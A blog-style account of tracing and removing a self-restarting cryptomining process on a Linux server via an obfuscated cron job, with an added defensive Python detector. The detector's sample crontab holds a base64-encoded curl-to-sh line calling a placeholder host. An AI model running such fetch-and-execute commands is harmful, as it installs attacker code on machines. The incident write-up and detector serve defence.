One day at a dinner party, a friend told me that there was an abnormal process on his server: it was running at full CPU all the time. After a humble meal, I promised him that I would log in to his server and look at the specific situation.


That day was May 1, the annual Labor Day. I was idle at home watching a variety show when my phone rang with a WeChat message. He had sent me two pictures, which immediately aroused my curiosity.

The exe link in the proc directory pointed to a file that had been deleted. When I saw this, I suspected that the process must be hiding itself. In a flash of inspiration, I asked my friend for the root password. I logged in to the server, ran the top command, and found a strange process running. I killed it with the kill command, and after waiting ten minutes it still had not come back, so I told my friend it was killed. He asked whether I had really killed it off; I said yes, but he added that this process tends to come back some time after being killed. I asked him how long it took to restart, and he didn't know whether it would be a day or so. At this point I panicked: if it took a day to restart, I would still have to check again tomorrow, which was really frustrating. I went back to watching my variety show.

Not long after, I checked again and saw that the process had started again under a different name, once more burning the CPU. While studying the process's runtime files, I noticed:

This process connects to a server in Korea. When I visited that IP, I found it was a normal website with nothing abnormal about it.

At the same time, when looking at the running directory, I found the following problems:

The command used to run the file was also missing, and the running directory had been deleted. At that point I was stuck and didn't know what to do, when I suddenly remembered a script that was run on a regular schedule. The opening of the script looks like this:


I found that this script was obfuscated with base64 encoding. I found a decoding tool on the Internet, and after decoding it turned out to be another script.

The complete script is shown below:

It writes a temporary file, gives it execute permission, runs it, and deletes it once execution completes. That is why the file in the execution directory showed up red and missing.

The best part is here; this is the key. The script splices together a URL to download the virus file. Through a series of operations it first looks up the local IP, then who I am (whoami), then the machine architecture, then the host name, and also the IPs of all local network cards. The key is that it takes an md5sum of the network information. Finally it reads the scheduled tasks and turns all of this into a base64 string.

Next it downloads the script, executes it, and adds the scheduled task. The interesting thing is that this script dates from 2017 and is still in use. In the end, I removed all of its permissions, renamed it, and deleted the scheduled task.
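A defender-side check for the two artifacts described in this post: a cron entry that hides its real command behind `base64 -d | sh`, and a process whose `/proc/<pid>/exe` link points at a deleted binary. This is an added example, not the script from the server; the crontab lines and the `example.invalid` URL are constructed placeholders.

```python
import base64
import os
import re

# Constructed sample crontab (not from the compromised server); the URL is a placeholder.
HIDDEN_CMD = "curl -s http://example.invalid/x/$(whoami)/$(arch).sh | sh"
ENCODED_CMD = base64.b64encode(HIDDEN_CMD.encode()).decode()
SAMPLE_CRONTAB = (
    "# m h dom mon dow command\n"
    "0 3 * * * /usr/bin/certbot renew --quiet\n"
    f"*/5 * * * * echo {ENCODED_CMD} | base64 -d | sh\n"
)
# A run of base64 alphabet at least 20 chars long, with optional '=' padding.
BASE64_TOKEN = re.compile(r"(?:[A-Za-z0-9+/]{4}){5,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")
# The decode step that turns the blob back into a command before it reaches a shell.
DECODE_HINT = re.compile(r"base64\s+(?:-d|--decode)")


def decode_suspicious_cron(crontab_text: str) -> list[tuple[str, str]]:
    """Return (cron line, decoded payload) for lines that base64-decode into a shell."""
    findings = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#") or not DECODE_HINT.search(line):
            continue
        for token in BASE64_TOKEN.findall(line):
            try:
                decoded = base64.b64decode(token, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue  # not real base64, or a binary blob: skip this token
            if decoded.isprintable():
                findings.append((line, decoded))
    return findings


def deleted_exe_processes(proc_root: str = "/proc") -> list[tuple[int, str]]:
    """Return (pid, exe target) for processes whose binary was unlinked from disk."""
    hits = []
    pids = [e for e in os.listdir(proc_root) if e.isdigit()] if os.path.isdir(proc_root) else []
    for entry in pids:
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or no permission (run as root)
        if target.endswith(" (deleted)"):
            hits.append((int(entry), target))
    return hits


if __name__ == "__main__":
    for line, decoded in decode_suspicious_cron(SAMPLE_CRONTAB):
        print("cron entry:", line, "\nhidden cmd:", decoded)
    for pid, target in deleted_exe_processes():
        print(f"pid {pid} is running a deleted binary: {target}")
```

Run it as root on the suspect host (feeding it the output of `crontab -l` and the files under `/etc/cron*`) so that every process's exe link is readable.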

At this point the virus had been cleaned up.